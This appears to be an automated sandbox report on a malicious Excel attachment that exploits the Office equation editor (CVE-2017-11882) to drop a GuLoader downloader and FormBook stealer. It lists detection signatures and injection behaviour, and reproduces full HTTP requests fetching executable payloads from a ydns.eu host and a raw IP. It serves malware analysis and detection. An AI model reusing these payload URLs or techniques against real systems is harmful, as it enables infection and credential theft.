Analysis Report Unique food order.xlsx

Overview

General Information

Sample Name: Unique food order.xlsx
Analysis ID: 320235
MD5: f2cd263042fce1a4c2cbeed5f1676429
SHA1: 608334d6c55e50f3447f865bca59e05b7b60e0cb
SHA256: f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe Avira URL Cloud: Label: malware
Source: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Unique food order.xlsx Virustotal: Detection: 24% Perma Link
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Source: Unique food order.xlsx Virustotal: Detection: 24% Perma Link
Source: Unique food order.xlsx ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_00097295
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_000972A5
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_00097295
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_000972A5
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Source: global traffic DNS query: name: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.125.191.5:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
Source: Traffic Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49165 -> 103.125.191.5:80
Source: Traffic Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.22:49166 -> 103.125.191.5:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 19 Nov 2020 06:43:17 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Wed, 18 Nov 2020 21:48:32 GMTETag: "f000-5b4689298b6b3"Accept-Ranges: bytesContent-Length: 61440Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8a a6 b8 50 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 c0 00 00 00 30 00 00 00 00 00 00 18 12 00 00 00 10 00 00 00 d0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 10 00 00 e9 b7 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 c3 00 00 3c 00 00 00 00 f0 00 00 f8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 30 00 00 00 00 10 00 00 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 b6 00 00 00 10 00 00 00 c0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 bc 13 00 00 00 d0 00 00 00 10 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 08 00 00 00 f0 00 00 00 10 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 ee 5b 23 58 18 00 00 00 c3 1f b0 49 23 00 00 00 00 00 00 00 00 00 00 00 55 53 45 52 33 32 2e 44 4c 4c 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5F9F InternetReadFile, 5_2_001B5F9F
Source: C:\Users\Public\vbc.exe Code function: 5_2_001B5F9F InternetReadFile, 5_2_001B5F9F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to behavior
Source: global traffic HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /worksdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin_xMjelaYnr43.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.125.191.5Cache-Control: no-cache
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com86f equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000005.00000002.2360648319.000000000080B000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown DNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Source: unknown DNS traffic detected: queries for: wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: vbc.exe String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: vbc.exe String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.bin
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binY~f
Source: vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp String found in binary or memory: http://103.125.191.5/bin_xMjelaYnr43.binq~f
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031044B EnumWindows,NtSetInformationThread, 4_2_0031044B
Source: C:\Users\Public\vbc.exe Code function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA, 4_2_003154F4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315A6C NtProtectVirtualMemory, 4_2_00315A6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA, 4_2_003106B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315336 NtSetInformationThread,LoadLibraryA, 4_2_00315336
Source: C:\Users\Public\vbc.exe Code function: 4_2_0031232A NtWriteVirtualMemory, 4_2_0031232A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00315F9F NtResumeThread, 4_2_00315F9F
